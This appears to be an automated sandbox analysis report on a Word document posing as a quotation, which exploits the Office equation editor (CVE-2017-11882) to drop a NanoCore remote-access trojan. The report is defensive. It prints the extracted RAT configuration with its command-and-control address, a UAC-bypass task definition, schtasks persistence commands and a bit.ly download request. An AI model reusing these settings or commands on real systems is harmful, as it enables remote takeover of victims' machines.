Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report QUOTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.doc

Overview

General Information

Sample Name:QUOTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.doc
Analysis ID:358179
MD5:bc1c94e783483f1c218efb5dcaf5f67e
SHA1:7747c98d3d2da16f6e8b2fc56bd0e84532e3a543
SHA256:d1e84cab5bf5eadd159b04374dce5a78a0e93156086475d41ad86665357dfc66
Tags:doc
Infos:

Most interesting Screenshot:

Detection

Nanocore GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Nanocore Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: NanoCore
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected GuLoader
Yara detected Nanocore RAT
C2 URLs / IPs found in malware configuration
Connects to a URL shortener service
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Adds / modifies Windows certificates
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Drops certificate files (DER)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2200 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 2308 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • 69577.exe (PID: 2680 cmdline: C:\Users\Public\69577.exe MD5: A6AD1C3046A3CF0C6992507F2886AAB3)
      • RegAsm.exe (PID: 2916 cmdline: C:\Users\Public\69577.exe MD5: 246BB0F8D68A463FD17C235DEB5491C0)
      • RegAsm.exe (PID: 2488 cmdline: C:\Users\Public\69577.exe MD5: 246BB0F8D68A463FD17C235DEB5491C0)
        • schtasks.exe (PID: 3060 cmdline: 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp9445.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
        • schtasks.exe (PID: 2276 cmdline: 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp80F5.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
  • taskeng.exe (PID: 2272 cmdline: taskeng.exe {DA6299CA-95CA-4E9D-8945-2CC05321254C} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1] MD5: 65EA57712340C09B1B0C427B4848AE05)
    • RegAsm.exe (PID: 1904 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 0 MD5: 246BB0F8D68A463FD17C235DEB5491C0)
    • smtpsvc.exe (PID: 2348 cmdline: 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0 MD5: 246BB0F8D68A463FD17C235DEB5491C0)
  • filename1.exe (PID: 1552 cmdline: 'C:\Users\user\subfolder1\filename1.exe' MD5: A6AD1C3046A3CF0C6992507F2886AAB3)
  • smtpsvc.exe (PID: 2560 cmdline: 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' MD5: 246BB0F8D68A463FD17C235DEB5491C0)
  • cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "92421eeb-c456-44c2-ab8d-5a66d7e5ab97", "Group": "Company", "Domain1": "194.5.98.202", "Domain2": "", "Port": 4488, "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo />\r\n  <Triggers />\r\n  <Principals>\r\n    <Principal id=\"Author\">\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>4</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Author\">\r\n    <Exec>\r\n      <Command>\"#EXECUTABLEPATH\"</Command>\r\n      <Arguments>$(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.2371344330.0000000000140000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0xf7ad:$x1: NanoCore.ClientPluginHost
  • 0xf7da:$x2: IClientNetworkHost
00000006.00000002.2371344330.0000000000140000.00000004.00000001.sdmpNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
  • 0xf7ad:$x2: NanoCore.ClientPluginHost
  • 0x10888:$s4: PipeCreated
  • 0xf7c7:$s5: IClientLoggingHost
00000006.00000002.2371344330.0000000000140000.00000004.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
    00000006.00000002.2371329317.0000000000130000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
    • 0xe75:$x1: NanoCore.ClientPluginHost
    • 0xe8f:$x2: IClientNetworkHost
    00000006.00000002.2371329317.0000000000130000.00000004.00000001.sdmpNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
    • 0xe75:$x2: NanoCore.ClientPluginHost
    • 0x1261:$s3: PipeExists
    • 0x1136:$s4: PipeCreated
    • 0xeb0:$s5: IClientLoggingHost
    Click to see the 5 entries

    Unpacked PEs

    SourceRuleDescriptionAuthorStrings
    6.2.RegAsm.exe.130000.1.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
    • 0xe75:$x1: NanoCore.ClientPluginHost
    • 0xe8f:$x2: IClientNetworkHost
    6.2.RegAsm.exe.130000.1.raw.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
    • 0xe75:$x2: NanoCore.ClientPluginHost
    • 0x1261:$s3: PipeExists
    • 0x1136:$s4: PipeCreated
    • 0xeb0:$s5: IClientLoggingHost
    6.2.RegAsm.exe.144629.2.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
    • 0xb184:$x1: NanoCore.ClientPluginHost
    • 0xb1b1:$x2: IClientNetworkHost
    6.2.RegAsm.exe.144629.2.raw.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
    • 0xb184:$x2: NanoCore.ClientPluginHost
    • 0xc25f:$s4: PipeCreated
    • 0xb19e:$s5: IClientLoggingHost
    6.2.RegAsm.exe.144629.2.raw.unpackJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
      Click to see the 20 entries

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\Public\69577.exe, CommandLine: C:\Users\Public\69577.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\69577.exe, NewProcessName: C:\Users\Public\69577.exe, OriginalFileName: C:\Users\Public\69577.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2308, ProcessCommandLine: C:\Users\Public\69577.exe, ProcessId: 2680
      Sigma detected: EQNEDT32.EXE connecting to internetShow sources
      Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 67.199.248.10, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2308, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
      Sigma detected: File Dropped By EQNEDT32EXEShow sources
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2308, TargetFilename: C:\Users\Public\69577.exe
      Sigma detected: NanoCoreShow sources
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, ProcessId: 2488, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat
      Sigma detected: Scheduled temp file as task from temp locationShow sources
      Source: Process startedAuthor: Joe Security: Data: Command: 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp9445.tmp', CommandLine: 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp9445.tmp', CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\Public\69577.exe, ParentImage: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, ParentProcessId: 2488, ProcessCommandLine: 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp9445.tmp', ProcessId: 3060
      Sigma detected: Executables Started in Suspicious FolderShow sources
      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\Public\69577.exe, CommandLine: C:\Users\Public\69577.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\69577.exe, NewProcessName: C:\Users\Public\69577.exe, OriginalFileName: C:\Users\Public\69577.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2308, ProcessCommandLine: C:\Users\Public\69577.exe, ProcessId: 2680
      Sigma detected: Execution in Non-Executable FolderShow sources
      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\Public\69577.exe, CommandLine: C:\Users\Public\69577.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\69577.exe, NewProcessName: C:\Users\Public\69577.exe, OriginalFileName: C:\Users\Public\69577.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2308, ProcessCommandLine: C:\Users\Public\69577.exe, ProcessId: 2680
      Sigma detected: Suspicious Program Location Process StartsShow sources
      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\Public\69577.exe, CommandLine: C:\Users\Public\69577.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\69577.exe, NewProcessName: C:\Users\Public\69577.exe, OriginalFileName: C:\Users\Public\69577.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2308, ProcessCommandLine: C:\Users\Public\69577.exe, ProcessId: 2680

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Found malware configurationShow sources
      Source: 00000006.00000002.2382867266.000000001F3FF000.00000004.00000001.sdmpMalware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "92421eeb-c456-44c2-ab8d-5a66d7e5ab97", "Group": "Company", "Domain1": "194.5.98.202", "Domain2": "", "Port": 4488, "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n <RegistrationInfo />\r\n <Triggers />\r\n <Principals>\r\n <Principal id=\"Author\">\r\n <LogonType>InteractiveToken</LogonType>\r\n <RunLevel>HighestAvailable</RunLevel>\r\n </Principal>\r\n </Principals>\r\n <Settings>\r\n <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n <AllowHardTerminate>true</AllowHardTerminate>\r\n <StartWhenAvailable>false</StartWhenAvailable>\r\n <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n <IdleSettings>\r\n <StopOnIdleEnd>false</StopOnIdleEnd>\r\n <RestartOnIdle>false</RestartOnIdle>\r\n </IdleSettings>\r\n <AllowStartOnDemand>true</AllowStartOnDemand>\r\n <Enabled>true</Enabled>\r\n <Hidden>false</Hidden>\r\n <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n <WakeToRun>false</WakeToRun>\r\n <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n <Priority>4</Priority>\r\n </Settings>\r\n <Actions Context=\"Author\">\r\n <Exec>\r\n <Command>\"#EXECUTABLEPATH\"</Command>\r\n <Arguments>$(Arg0)</Arguments>\r\n </Exec>\r\n </Actions>\r\n</Task"}
      Multi AV Scanner detection for dropped fileShow sources
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\wREzo[1].txtVirustotal: Detection: 42%Perma Link
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\wREzo[1].txtReversingLabs: Detection: 27%
      Source: C:\Users\user\subfolder1\filename1.exeReversingLabs: Detection: 27%
      Source: C:\Users\Public\69577.exeReversingLabs: Detection: 27%
      Multi AV Scanner detection for submitted fileShow sources
      Source: QUOTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.docVirustotal: Detection: 39%Perma Link
      Source: QUOTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.docReversingLabs: Detection: 25%
      Yara detected Nanocore RATShow sources
      Source: Yara matchFile source: 00000006.00000002.2371344330.0000000000140000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.2382867266.000000001F3FF000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2488, type: MEMORY
      Source: Yara matchFile source: 6.2.RegAsm.exe.144629.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.RegAsm.exe.1f41b071.12.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.RegAsm.exe.1f416a48.10.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.RegAsm.exe.140000.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.RegAsm.exe.140000.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.RegAsm.exe.1f416a48.10.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.RegAsm.exe.1f4020ad.11.raw.unpack, type: UNPACKEDPE
      Source: 6.2.RegAsm.exe.140000.3.unpackAvira: Label: TR/NanoCore.fadte

      Exploits:

      barindex
      Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\69577.exe
      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

      Compliance:

      barindex
      Uses new MSVCR DllsShow sources
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Binary contains paths to debug symbolsShow sources
      Source: Binary string: .pdb< source: RegAsm.exe, 00000006.00000002.2383237704.000000002114B000.00000004.00000001.sdmp
      Source: Binary string: ystem.pdb source: RegAsm.exe, 00000006.00000002.2371574970.0000000000576000.00000004.00000040.sdmp
      Source: Binary string: System.pdbSystem.pdbpdbtem.pdbm\2.0.0.0__b77a5c561934e089\System.pdb9FFP source: RegAsm.exe, 00000006.00000002.2383237704.000000002114B000.00000004.00000001.sdmp
      Source: Binary string: !symbols\dll\System.pdb source: RegAsm.exe, 00000006.00000002.2383237704.000000002114B000.00000004.00000001.sdmp
      Source: Binary string: System.pdb H~t source: RegAsm.exe, 00000006.00000002.2383237704.000000002114B000.00000004.00000001.sdmp
      Source: Binary string: nWindows\System.pdbpdbtem.pdb source: RegAsm.exe, 00000006.00000002.2371574970.0000000000576000.00000004.00000040.sdmp
      Source: Binary string: C:\Windows\dll\System.pdb source: RegAsm.exe, 00000006.00000002.2371574970.0000000000576000.00000004.00000040.sdmp
      Source: Binary string: WT3UpC:\Windows\System.pdb source: RegAsm.exe, 00000006.00000002.2383237704.000000002114B000.00000004.00000001.sdmp
      Source: Binary string: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.pdb source: RegAsm.exe, 00000006.00000002.2371574970.0000000000576000.00000004.00000040.sdmp
      Source: Binary string: < indows\RegAsm.pdbpdbAsm.pdb source: RegAsm.exe, 00000006.00000002.2371574970.0000000000576000.00000004.00000040.sdmp
      Source: Binary string: < indows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb\cs source: RegAsm.exe, 00000006.00000002.2371574970.0000000000576000.00000004.00000040.sdmp
      Source: Binary string: RegAsm.pdb source: smtpsvc.exe, smtpsvc.exe.6.dr
      Source: Binary string: !C:\Windows\System.pdb@= source: RegAsm.exe, 00000006.00000002.2383237704.000000002114B000.00000004.00000001.sdmp
      Source: Binary string: Wm.pdb source: RegAsm.exe, 00000006.00000002.2383056342.00000000203CD000.00000004.00000001.sdmp
      Source: Binary string: C:\Windows\symbols\dll\System.pdb source: RegAsm.exe, 00000006.00000002.2371574970.0000000000576000.00000004.00000040.sdmp
      Source: Binary string: System.pdb source: RegAsm.exe, 00000006.00000002.2383237704.000000002114B000.00000004.00000001.sdmp
      Source: Binary string: System.pdb8 source: RegAsm.exe, 00000006.00000002.2371574970.0000000000576000.00000004.00000040.sdmp
      Source: Binary string: mscorrc.pdb source: RegAsm.exe, 00000006.00000002.2371259124.00000000000D0000.00000002.00000001.sdmp
      Source: Binary string: C:\Windows\System.pdb source: RegAsm.exe, 00000006.00000002.2371574970.0000000000576000.00000004.00000040.sdmp
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dll
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\6f4f738362752c5d3a2c9234d604784d\System.Drawing.ni.dll
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dll
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\
      Source: global trafficDNS query: name: bit.ly
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 5.79.72.163:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 67.199.248.10:80

      Networking:

      barindex
      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49171 -> 194.5.98.202:4488
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49172 -> 194.5.98.202:4488
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49173 -> 194.5.98.202:4488
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49174 -> 194.5.98.202:4488
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49175 -> 194.5.98.202:4488
      C2 URLs / IPs found in malware configurationShow sources
      Source: Malware configuration extractorURLs:
      Source: Malware configuration extractorURLs: 194.5.98.202
      Connects to a URL shortener serviceShow sources
      Source: unknownDNS query: name: bit.ly
      Source: unknownDNS query: name: bit.ly
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 194.5.98.202:4488
      Source: Joe Sandbox ViewIP Address: 67.199.248.10 67.199.248.10
      Source: Joe Sandbox ViewASN Name: GOOGLE-PRIVATE-CLOUDUS GOOGLE-PRIVATE-CLOUDUS
      Source: Joe Sandbox ViewASN Name: DANILENKODE DANILENKODE
      Source: global trafficHTTP traffic detected: GET /2ZKf4aq HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: bit.lyConnection: Keep-Alive
      Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.202
      Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.202
      Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.202
      Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.202
      Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.202
      Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.202
      Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.202
      Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.202
      Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.202
      Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.202
      Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.202
      Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.202
      Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.202
      Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.202
      Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.202
      Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.202
      Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.202
      Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.202
      Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.202
      Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.202
      Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.202
      Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.202
      Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.202
      Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.202
      Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.202
      Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.202
      Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.202
      Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.202
      Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.202
      Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.202
      Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.202
      Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.202
      Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.202
      Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.202
      Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.202
      Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.202
      Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.202
      Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.202
      Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.202
      Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.202
      Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.202
      Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.202
      Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.202
      Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.202
      Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.202
      Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.202
      Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.202
      Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.202
      Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.202
      Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.202
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 6_2_007B2E3E WSARecv,
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{24864F90-30CA-4646-ACFF-79FC9E14ADCB}.tmpJump to behavior
      Source: global trafficHTTP traffic detected: GET /2ZKf4aq HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: bit.lyConnection: Keep-Alive
